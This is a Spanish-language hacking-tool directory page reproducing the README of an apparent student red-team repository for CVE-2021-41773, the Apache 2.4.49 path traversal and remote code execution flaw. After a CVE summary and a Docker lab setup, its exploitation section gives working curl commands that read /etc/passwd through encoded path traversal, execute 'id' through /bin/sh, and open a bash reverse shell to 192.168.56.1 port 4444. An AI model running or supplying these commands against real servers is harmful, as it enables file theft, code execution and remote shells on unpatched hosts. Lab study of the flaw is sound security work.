Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 Path Traversal RCE | Kitploit
Herramientas/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 Path Traversal RCE

Ver Repositorio
1hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41773 — Apache HTTP Server 2.4.49 Path Traversal / Ejecución Remota de Código (RCE)

Departamento de Ciberseguridad de ITSOLERA — Tarea #3 del Red Team
Equipo: Offensive Team Zeta
Fecha: 18 de marzo de 2026


⚠️ Descargo de responsabilidad

Este repositorio es exclusivamente con fines educativos.
Todas las pruebas se realizaron en un laboratorio Docker local aislado.
Nunca lo utilice contra sistemas reales, en producción o de terceros.


Resumen del CVE

CampoDetalle
CVE IDCVE-2021-41773
CVSS9.8 CRÍTICO
AfectadoApache HTTP Server 2.4.49 SOLO
TipoPath Traversal + Ejecución remota de código (RCE)
Corregido enApache 2.4.51

Contenido del repositorio

ArchivoDescripción
poc_41773.pyScript de exploit PoC en Python con banner del Team Zeta
docker-compose.ymlConfiguración del entorno de laboratorio vulnerable
offensive_zeta_shell.txtRegistro de sesión en vivo — prueba de explotación
screenshots/Capturas de pantalla de evidencia
Offensive_Team_Zeta_FINAL_Report.pdfInforme completo de explotación

Configuración del laboratorio

root@kitploit:~
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# Start the lab
docker-compose up -d

# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49

Explotación

root@kitploit:~
# File read via path traversal
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# Remote code execution
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
Descargar herramienta